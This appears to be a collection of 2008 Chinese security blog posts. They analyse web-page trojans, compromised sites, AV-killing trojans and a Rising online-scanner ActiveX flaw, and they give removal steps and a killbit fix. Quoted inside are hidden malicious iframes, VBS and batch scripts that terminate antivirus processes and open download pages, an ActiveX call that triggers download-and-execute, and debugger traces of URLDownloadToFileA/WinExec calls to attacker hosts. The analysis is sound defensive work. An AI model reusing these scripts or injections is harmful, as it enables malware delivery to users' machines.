知道创宇

 经过网友举报，http://www.mwsc.org.cn/（恶意网站风暴中心）上挂有恶意脚本。

通过检测发现在点击下载该HOSTS反黑文件的时候会访问一个404页面，该页面挂有恶意脚本的框架连接。

点击下载之后，会转到一个404页面，其实根本没有那个反黑文件的资源可以下载，以下是404页面的代码：

其中有一段脚本调用：
<script language=”javascript” src=”http://ad.shitip.com/file/da.js”></script>
此脚本里判断了COOKIES，然后再调用了http://ad.shitip.com/file/ad.js
http://ad.shitip.com/file/ad.js是一个挂马集合模版：
包含：
http://ww.shitip.com/file/gdisvc.htm
–》06014漏洞页，下载http://ww.shitip.com/file/images/gdisvc.jpg以及
http://ww.shitip.com/file/images/top.jpg
其他的第3方软件漏洞页下载http://ww.shitip.com/file/images/gdisvc.jpg
包含有讯雷，PPS，REAL，QVOD，暴风。请及时网友们注意此类网站。
知道创宇的浏览器安全插件即将推出，敬请期待。安装该插件以后可以让网友尽情浏览网站。

Popularity: 8% [?]

2008年2月26日瑞星安全工程师确认，“瑞星在线杀毒2007”产品的控件中，存在一个安全缺陷，黑客有可能利用该缺陷威胁用户的电脑安全。瑞星公司提醒所有使用瑞星“在线杀毒2007”和“在线查毒2007”服务的用户，尽快访问瑞星在线杀毒服务页面，升级更新该控件，即可消除该隐患。    瑞星反病毒工程师表示，目前还没有监测到利用该安全缺陷的病毒和木马，但是秉承对用户负责的态度，瑞星公司在发现该问题后立即升级了该控件，并发出警示消息。

    该安全缺陷只针对“瑞星在线杀毒2007”和“在线查毒2007”的用户。

    对于该问题给用户带来的不便，瑞星公司表示诚挚的歉意。

Popularity: 9% [?]

转自: http://secure.itdigger.com/2008/02/28/412646918609.htm

一、 病毒标签：Trojan.BAT.KillAV.gx
病毒名称：
MD5: 0AA1285C6B4A0836491E3B6C4B3F0ED9

文件长度： 42.6 KB (43,641 字节)
公开范围： 完全公开
危害等级： C

加壳类型： UPX+自解压缩包壳
命名对照： 

金山毒霸
 2007.6.20.249
 2008.2.27
 2008-02-27
 Win32.Troj.KillAV.gx.151552
 3.756
 
二、 病毒描述：

该病毒为http://www.bebecu.com/self/kill.htm恶意网页所下载的病毒。释放BAT。VBS，等文件破坏主动防御及杀毒软件。

三、 行为分析：

该样本为自解压缩包，使用以下命令进行自动解压执行程序：

;下面的注释包含自解压脚本命令
 
Path=%systemroot%\temp

SavePath

Setup=kill.vbs

Silent=1

Overwrite=1
 
释放kill.bat,kill.vbs, knlps.exe至TEMP文件夹。

释放后执行VBS文件，内容如下：

set ws=wscript.createobject(”wscript.shell”)

ws.run “%systemroot%\temp\kill.bat”,0

wscript.sleep 10000

Ws.run “IEXPLORE.EXE http://www.sokuoo.com/self/2.htm”,0

访问2.htm，该网页为MS06014漏洞网页，下载http://cj.sokuoo.com/self/dl.exe

该病毒为下载者。

VBS还运行了kill.bat。该BAT内容如下：

@echo off
 
knlps.exe -l >PID.txt
 
findstr /i “RavMon.exe” PID.txt >>rav.txt

findstr /i “RavMonD.exe” PID.txt >>rav.txt

findstr /i “CCenter.exe” PID.txt >>rav.txt

findstr /i “avp.exe” PID.txt >>rav.txt

findstr /i “avp.exe” PID.txt >>rav.txt

findstr /i “KVMonXP.kxp” PID.txt >>rav.txt

findstr /i “KVxp.kxp” PID.txt >>rav.txt

findstr /i “kvsrvxp.exe” PID.txt >>rav.txt

findstr /i “kvwsc.exe” PID.txt >>rav.txt

findstr /i “KAVStart.exe” PID.txt >>rav.txt

findstr /i “KWatch.exe” PID.txt >>rav.txt

findstr /i “KPFW32.exe” PID.txt >>rav.txt

findstr /i “KPFWSvc.exe” PID.txt >>rav.txt

findstr /i “rfwsrv.exe” PID.txt >>rav.txt

findstr /i “rfwproxy.exe” PID.txt >>rav.txt

findstr /i “rfwmain.exe” PID.txt >>rav.txt

findstr /i “Navapw32.exe” PID.txt >>rav.txt

findstr /i “Navapsvc.exe” PID.txt >>rav.txt

findstr /i “rising.exe” PID.txt >>rav.txt

findstr /i “Symantec.exe” PID.txt >>rav.txt

findstr /i “rtvscan.exe” PID.txt >>rav.txt

findstr /i “ccApp.exe” PID.txt >>rav.txt

findstr /i “VTPRay.exe” PID.txt >>rav.txt

findstr /i “360tray.exe” PID.txt >>rav.txt

for /f “eol=; tokens=1 delims= ” %%1 in (rav.txt) do knlps.exe -k %%1
 
::=========清除痕迹============================

RD /S /Q %systemroot%\temp\

del %0
 
获取以上进程的PID值然后使用knlps.exe关闭进程。以此来破坏主动防御以及杀毒软件，让下载者可以顺利进驻系统运作。

最后清除TEMP目录下的文件。

解决方案：

屏蔽www.sokuoo.com及cj.sokuoo.com
 
注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%   = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
     %Windir%\       WINDODWS所在目录
%DriveLetter%\    逻辑驱动器根目录
%ProgramFiles%\    系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录

A级
大面积感染流行，并具有以下条件中的任意一个给网络造成严重压力、开有后门、反制AV技术。
B级
有一定的感染流行面积，或者有鲜明的技术特点值得进一步关注，或为既往A级蠕虫比较成熟的变种
C级
有少量感染流行，或虽然有一定感染流行面积，但是既往B级蠕虫变种。
D级
有极少量感染流行，但有一定潜在威胁。
E级
没有发现感染流行。

Popularity: 11% [?]

 转自:http://secure.itdigger.com/2008/02/28/412652775656.htm

一、 病毒标签：
病毒名称： Trojan.Win32.KillAV.ok
MD5: 5E6D28472E2975EE0DCF92A7A64D906C

文件长度：   72.1 KB (73,864 字节)

公开范围： 完全公开
危害等级： C

加壳类型： UPX+自解压缩包
命名对照： 

瑞星
 20.0
 20.32.42.00
 2008-02-22
 Worm.Win32.AvKiller.cz
 4.370
 
二、 病毒描述：

该病毒为http://www.bebecu.com/self/real.html病毒页面下载并执行。释放BAT

。VBS等脚本文件破坏杀软及主动防御。释放2.exe盗取QQ帐号。

三、 行为分析：

该压缩包带有自动解压并执行的命令：

Path=%systemroot%\temp\

SavePath

Setup=2.vbs

Silent=1

Overwrite=2

将文件2.bat，2.vbs.2.exe, knlps.exe释放至temp\目录下并执行。

2．Vbs

该VBS内容如下：

set ws=wscript.createobject(”wscript.shell”)

ws.run “%systemroot%\temp\2.bat”,0

wscript.sleep 10000

ws.run “%systemroot%\temp\2.exe”,0

Ws.run “IEXPLORE.EXE http://www.kis.ac.cn/realtj.html”,0

调用2.bat与2.exe。访问http://www.kis.ac.cn/realtj.html进行REAL网马的肉鸡

统计。

2.bat内容如下：

@echo off
 
knlps.exe -l >PID.txt

set pva=avp.exe

findstr /i %pva% PID.txt >>rav.txt

findstr /i %pva% PID.txt >>rav.txt

findstr /i “RavMon.exe” PID.txt >>rav.txt

findstr /i “RavMonD.exe” PID.txt >>rav.txt

findstr /i “CCenter.exe” PID.txt >>rav.txt

findstr /i “KVMonXP.kxp” PID.txt >>rav.txt

findstr /i “KVxp.kxp” PID.txt >>rav.txt

findstr /i “kvsrvxp.exe” PID.txt >>rav.txt

findstr /i “kvwsc.exe” PID.txt >>rav.txt

findstr /i “KAVStart.exe” PID.txt >>rav.txt

findstr /i “KWatch.exe” PID.txt >>rav.txt

findstr /i “KPFW32.exe” PID.txt >>rav.txt

findstr /i “KPFWSvc.exe” PID.txt >>rav.txt

findstr /i “rfwsrv.exe” PID.txt >>rav.txt

findstr /i “rfwproxy.exe” PID.txt >>rav.txt

findstr /i “rfwmain.exe” PID.txt >>rav.txt

findstr /i “Navapw32.exe” PID.txt >>rav.txt

findstr /i “Navapsvc.exe” PID.txt >>rav.txt

findstr /i “rising.exe” PID.txt >>rav.txt

findstr /i “Symantec.exe” PID.txt >>rav.txt

findstr /i “rtvscan.exe” PID.txt >>rav.txt

findstr /i “ccApp.exe” PID.txt >>rav.txt

findstr /i “VTPRay.exe” PID.txt >>rav.txt

findstr /i “360tray.exe” PID.txt >>rav.txt

for /f “eol=; tokens=1 delims= ” %%1 in (rav.txt) do knlps.exe -k %%1
 
获取以上进程的PID，调用knlps.exe结束其进程。
 
2.exe为Trojan.Win32.KillAV.ok。

该病毒破坏瑞星，360安全卫士，卡巴等杀软的正常运行。

释放：

C:\WINDOWS\system32\gopen.exe 
C:\WINDOWS\system32\winso32.sys
C:\WINDOWS\system32\LCInstall.exe 
C:\WINDOWS\system32\msxl32.dll 
C:\WINDOWS\system32\IVATE.DLL 
C:\WINDOWS\system32\QQHook.dll 

增加启动项目：

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\dxdiags.exe

注册C:\WINDOWS\system32\msxl32.dll：

HKCR\CLSID\{523C33CB-510E-4857-9801-78F1D892879C}\InprocServer32

     类型: REG_SZ

      值： C:\WINDOWS\system32\msxl32.dll

该DLL很有趣：

    HKEY_CLASSES_ROOT\CLSID\{523C33CB-510E-4857-9801-78F1D892879C}

“(Default)”

       Type: REG_SZ

       Data: WEB反病毒保护

注册服务：

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\winso32 “ImagePath”

       Type: REG_EXPAND_SZ

       Data: \??\C:\WINDOWS\system32\winso32.sys

该驱动在XPSP2下会蓝……

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winso32 “ImagePath”

       Type: REG_EXPAND_SZ

       Data: \??\C:\WINDOWS\system32\winso32.sys

还有一个隐蔽的启动项目被主动防御所忽略：

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor “AutoRun”

       Old type: REG_SZ

       New type: REG_SZ

       Old data:

       New data: C:\WINDOWS\system32\dxdiags.exe

运行CMD的时候会先搜寻其值，通过这样来达到启动病毒。

解决方案：

删除：

C:\WINDOWS\system32\gopen.exe 
C:\WINDOWS\system32\winso32.sys
C:\WINDOWS\system32\LCInstall.exe 
C:\WINDOWS\system32\msxl32.dll 
C:\WINDOWS\system32\IVATE.DLL 
C:\WINDOWS\system32\QQHook.dll 

修改：

       HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Winlogon “Userinit”

将Old data:
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\dxdiags.exe        
修改为

New data: C:\WINDOWS\system32\userinit.exe,

修改：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor “AutoRun”

将New data: C:\WINDOWS\system32\dxdiags.exe

修改为空值
删除注册表项目：

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\winso32

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winso32

HKEY_CLASSES_ROOT\CLSID\{523C33CB-510E-4857-9801-78F1D892879C}
注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹

的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，

windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安

装路径是C:\Windows\System32。
%Temp%   = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户

TEMP缓存变量
     %Windir%\       WINDODWS所在目录
%DriveLetter%\    逻辑驱动器根目录
%ProgramFiles%\    系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录

A级
大面积感染流行，并具有以下条件中的任意一个给网络造成严重压力、开有后门、

反制AV技术。
B级
有一定的感染流行面积，或者有鲜明的技术特点值得进一步关注，或为既往A级蠕

虫比较成熟的变种
C级
有少量感染流行，或虽然有一定感染流行面积，但是既往B级蠕虫变种。
D级
有极少量感染流行，但有一定潜在威胁。
E级
没有发现感染流行。
 
点击此处下载专杀工具

Popularity: 10% [?]

http://www.windows-vista-themes.cn
网友发现其网站存在恶意脚本.经过检测发现:

首页上挂了

<iframe src=http://www.bebecu.com/self/real.html width=0 height=0></iframe>
<iframe src=http://www.bebecu.com/self/kill.htm width=0 height=0></iframe>

http://www.bebecu.com/self/real.html

/*REAL漏洞*/–>http://www.kis.ac.cn/self/2.exe

http://www.bebecu.com/self/kill.htm

/*MS06014*/–>http://www.sokuoo.com/self/kill.exe

2个文件均为自解压缩包.其中包含VBS,BAT,EXE等恶意程序,破坏杀毒软件以及主动防御功能.

以上网址均被IESEC插件拦截.

请期待IESEC插件的正式版本.

详细分析请参考下一篇文章.

Popularity: 8% [?]

[wide]http://www.1uon.com/
    [script]http://www.1uon.com/files/js/article.js
        [frame]http://www.59.vc/page/add_8432.htm
            [script]http://www.59.vc/page/addr.js
         [frame]http://w18.vg/baidu.gif
              [frame]http://w18.vg/bf.gif
                [object]http://w18.vg/s.exe
              [frame]http://w18.vg/ms.gif
                [object]http://w18.vg/s.exe
              [frame]http://w18.vg/real.gif
                [object]http://w18.vg/s.exe
              [frame]http://w18.vg/lz.gif
                [object]http://w18.vg/s.exe
              [frame]http://w18.vg/xl.gif
                [object]http://w18.vg/s.exe  
         [frame]http://pr.749571.com/ww/new221.htm
            [frame]http://ad.haoliuliang.com/dm/diao.htm
                [object]http://mm.haoliuliang.com/bb/bd.cab
            [frame]http://ad.haoliuliang.com/dm/rl.htm
                [object]http://mm.haoliuliang.com/bb/rl.exe
            [frame]http://ad.haoliuliang.com/dm/rr.htm
                [object]http://mm.haoliuliang.com/bb/lz.exe
    [script]http://hn10.cn/inc
        [frame]http://51la.wssbbzy.com/31/2xx.htm
            [script]http://51la.wssbbzy.com/wm/rl.js
                [object]http://iii.chsip.net/cat.exe
            [frame]http://51la.wssbbzy.com/wm/jh.htm
                [frame]http://51la.wssbbzy.com/wm/*
                [script]http://ppp.chsip.net/wm/11.js
                    [object]http://iii.chsip.net/down.exe
                [script]http://ppp.chsip.net/wm/bb.js
                    [object]http://iii.chsip.net/down.exe
                [script]http://ppp.chsip.net/wm/ppp.js
                    [object]http://iii.chsip.net/down.exe
                [script]http://ppp.chsip.net/wm/lz.js    

Popularity: 7% [?]

 

改了BaseURL的地址为EXE.

估计作者不知道BaseURL是干什么的.= =b其实那是写olupdate.zip的目录.还要记得带/.

实现下载执行的还是DLL型的DOWNLOADER.

所以开发者还需要去编译一个DLL然后调试测试.

所以目前还不是此网马0DAY爆发期.大家可以放心.

Popularity: 9% [?]

 发布日期：2008-02-05

经过测试DEMO发现,黑客可通过编写DLL型的Downloader ,利用以下代码进行调用来执行指令:

rav.BaseURL = “http://www.scanw.com/“;
rav.Encardid = “0000$0000$0000″;
rav.UpdateEngine();

描述：

---

瑞星在线扫描在处理UpdateEngine的时候存在漏洞，如果用户执行了带有该恶意脚本的页面，就可能导致执行任意指令。<*来源：http://www.milw0rm.com/exploits/5188
测试页面：http://www.milw0rm.com/exploit.php?id=5188
*>

---

目前瑞星尚未修复此漏洞.  临时解决方案:给{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153}设置killbit.

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153}]
“Compatibility Flags”=dword:00000400

Popularity: 13% [?]

FROM:http://hi.baidu.com/cyto/blog/item/5fcbeafd892f0e41d6887d52.html

cat.exe

来源参考:http://www.scanw.com/blog/?p=5

0.请参考该文描述:
http://bbs.micropoint.com.cn/showthread.asp?tid=28056&fpage=1
该样本被执行后，将驱动文件“~46.tmp”（46是一个随机值）释放到％Temp％目录下，调用SCM写注册表将~46.tmp注册成名为 sys_flt的windows内核服务,并通过相关API启动；服务启动后创建磁盘设备“\Device\yyy2”，创建目录对象“\Device\ zzz”,通过函数DeviceIoControl调用相关控制码得到主DOS分区信息并获取设备号后关闭句柄；拷贝自身到开始->附件-> 启动组中，打开设备“\Device\yyy2”通过DeviceIoControl传递自身控制码8000F800访问物理磁盘，利用 CopyFileA函数将“%Temp%\~46.tmp”及启动组中的病毒文件拷贝到“\\.\yyy2”中，以达到突破还原卡的目的；在“% SystemRoot%\System32\”下释放批处理文件Deletedll.bat，执行后删除“%Temp%\~46.tmp”和 Deletedll.bat；病毒调用API函数URLDownloadToFileA从网络上下载各种病毒到系统磁盘根目录下并执行。

1.释放文件:
00405D52     E8 55E9FFFF              call 004046AC                             ; jmp to kernel32.CreateFileA
00405D8D     E8 2AE9FFFF              call 004046BC                             ; jmp to kernel32.WriteFile
(ASCII “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”)

2.创建服务:
00406165     B8 90614000              mov eax,406190                            ; ASCII “sys_flt”
0040616A     E8 D5EAFFFF              call 00404C44                             ; dumped_.00404C44
0012FEFC    00404CBB   /CALL to CreateServiceA from dumped_.00404CB6
0012FF00    0013CC08   |hManager = 0013CC08
0012FF04    00406190   |ServiceName = “sys_flt”
0012FF08    00406190   |DisplayName = “sys_flt”
0012FF0C    000F01FF   |DesiredAccess = SERVICE_ALL_ACCESS
0012FF10    00000002   |ServiceType = SERVICE_FILE_SYSTEM_DRIVER
0012FF14    00000003   |StartType = SERVICE_DEMAND_START
0012FF18    00000001   |ErrorControl = SERVICE_ERROR_NORMAL
0012FF1C    00C90138   |BinaryPathName = “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”
0012FF20    00000000   |LoadOrderGroup = NULL
0012FF24    00000000   |pTagId = NULL
0012FF28    00000000   |pDependencies = NULL
0012FF2C    00000000   |ServiceStartName = NULL
0012FF30    00000000   \Password = NULL

3.拷贝到启动项:
0012FF38    00406091   /CALL to CopyFileA from dumped_.0040608C
0012FF3C    00C90048   |ExistingFileName = “c:\documents and settings\gao1\”,D7,”",C0,”",C3,”",E6,”\dumped_.exe”
0012FF40    00C92D04   |NewFileName = “C:\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FF44    00000000   \FailIfExists = FALSE

00C92D04 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 C:\Documents and
00C92D14 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73   Settings\All Us
00C92D24 65 72 73 5C A1 B8 BF AA CA BC A1 B9 B2 CB B5 A5 ers\「开始」菜单
00C92D34 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 64 75 6D 70 65 \程序\启动\dumpe
00C92D44 64 5F 2E 65 78 65 00                             d_.exe.

4.利用CopyFileA函数将启动组中的病毒文件拷贝到创建的设备“\\.\yyy2”中
004056EF     50                       push eax
004056F0     E8 DFEFFFFF              call 004046D4                             ; jmp to kernel32.CopyFileA
0012FEE8    004056F5   /CALL to CopyFileA from dumped_.004056F0
0012FEEC    00C92D04   |ExistingFileName = “C:\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FEF0    00C92E28   |NewFileName = “\\.\yyy2\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FEF4    00000000   \FailIfExists = FALSE

00C92D04 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 C:\Documents and
00C92D14 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73   Settings\All Us
00C92D24 65 72 73 5C A1 B8 BF AA CA BC A1 B9 B2 CB B5 A5 ers\「开始」菜单
00C92D34 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 64 75 6D 70 65 \程序\启动\dumpe
00C92D44 64 5F 2E 65 78 65 00 00                          d_.exe..

00C92E28 5C 5C 2E 5C 79 79 79 32 5C 44 6F 63 75 6D 65 6E \\.\yyy2\Documen
00C92E38 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C ts and Settings\
00C92E48 41 6C 6C 20 55 73 65 72 73 5C A1 B8 BF AA CA BC All Users\「开始
00C92E58 A1 B9 B2 CB B5 A5 5C B3 CC D0 F2 5C C6 F4 B6 AF 」菜单\程序\启动
00C92E68 5C 64 75 6D 70 65 64 5F 2E 65 78 65 00 00 00 00 \dumped_.exe….

据说这点就是用来突破还原的.
对于如何创建设备\\.\yyy2的过程以及原理不甚了解.

5.扫尾:卸载服务,删除驱动
卸载服务:
004061B1     B8 DC614000              mov eax,4061DC                            ; ASCII “sys_flt”
004061B6     E8 DDEBFFFF              call 00404D98                             ; dumped_.00404D98

删除驱动:
00405F6A     E8 55E7FFFF              call 004046C4                             ; jmp to kernel32.DeleteFileA
0012FF70    00405F6F   /CALL to DeleteFileA from dumped_.00405F6A
0012FF74    00C90138   \FileName = “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”

6.下载文件,然后退出:
0040703E     68 D8704000              push 4070D8            ; ASCII “c:\1.exe”
00407043     68 E4704000              push 4070E4            ; ASCII “hxxp://iii.chsip.net/listtt.exe”
00407048     6A 00                    push 0
0040704A     E8 05FFFFFF              call 00406F54           ; jmp to urlmon.URLDownloadToFileA
0040704F     68 D8704000              push 4070D8             ; ASCII “c:\1.exe”
00407054     E8 03FFFFFF              call 00406F5C           ; jmp to kernel32.WinExec

0040705D     68 28714000              push 407128              ; ASCII “c:\2.exe”
00407062     68 34714000              push 407134              ; ASCII “hxxp://test.591jx.com/test.exe”
00407067     6A 00                    push 0
00407069     E8 E6FEFFFF              call 00406F54            ; jmp to urlmon.URLDownloadToFileA
0040706E     68 28714000              push 407128              ; ASCII “c:\2.exe”
00407073     E8 E4FEFFFF              call 00406F5C            ; jmp to kernel32.WinExec

Popularity: 5% [?]

   天极搜索被挂木马

http://www.yesky.com天极网为国内著名IT门户网站。2008年2月24日星期日中午11：00经过网友反映发现其搜索引擎结果返回页面被挂木马网页连接。

http://search.yesky.com/index.html为天极搜索主页。经过分析得知，木马页面挂在了搜索结果返回页上，假如搜索关键词没有相符的网页，会返回http://search.yesky.com/jsp/hint.jsp?type=1&wd=*****而这个页面是没有问题的。   看看搜索结果返回页的代码。发现底部被添加了一段框架http://www.yixoo.com/yixoo2.html页面代码包含一个框架：

 <iframe src=http://xxx.aishengho.com/dm.htm?id=002 width=100 height=0></iframe>

该域名的命名和参数都与一直以来流行的挂马页面相似：

http://xxx.9yimeiyuan.com/xx.htm?id=017

http://xxx.hao1680.com/xx.htm?id=017  

  http://xxx.aishengho.com/dm.htm?id=002包含如下代码。

2个调用和2个统计代码：

<script language=javascript src=http://town.521town.com/wm/rl.js></script>

 

<iframe src=http://town.521town.com/wm/jh.htm width=100 height=1></iframe>

 

</body></html>

 

<script src=’http://s55.cnzz.com/stat.php?id=474784&web_id=474784′ language=’JavaScript’ charset=’gb2312′></script>

 

  

<script language=”javascript” type=”text/javascript” src=”http://js.users.51.la/994346.js” mce_src=”http://js.users.51.la/994346.js”></script>

   

http://town.521town.com/wm/rl.js为REAL漏洞，代码没有经过加密，但做过了对卡巴的免杀，目前还是过了卡巴。将SHELLCODE经过ALPHA解密以后得出地址：

http://iii.chsip.net/cat.exe

 http://town.521town.com/wm/jh.htm为06014漏洞，下载http://iii.chsip.net/down.exe，底部加了调用代码。调用了包含PPS，暴风，联众等漏洞。均下载http://iii.chsip.net/down.exe。通过分析这些网马页面，发现均由cuteqq网马生成器所生成。 与近来流行的挂马页面的代码大体一致。以下为该网马生成器的信息：网站：http://www.cuteqq.cnQQ784378237

发现该组织所制造的网马比较成熟全面，使用者众多。危害甚大。但由于无法得到生成器，所以没有进行更深入的针对分析。不过从图中和介绍可见其软件所使用的漏洞都是网络流传公开的漏洞。并无严重0DAY。该恶意脚本域名早已被IE伴侣拦截：请及时升级更新IE伴侣的地址库。以便对恶意网站进行防御。  

Popularity: 10% [?]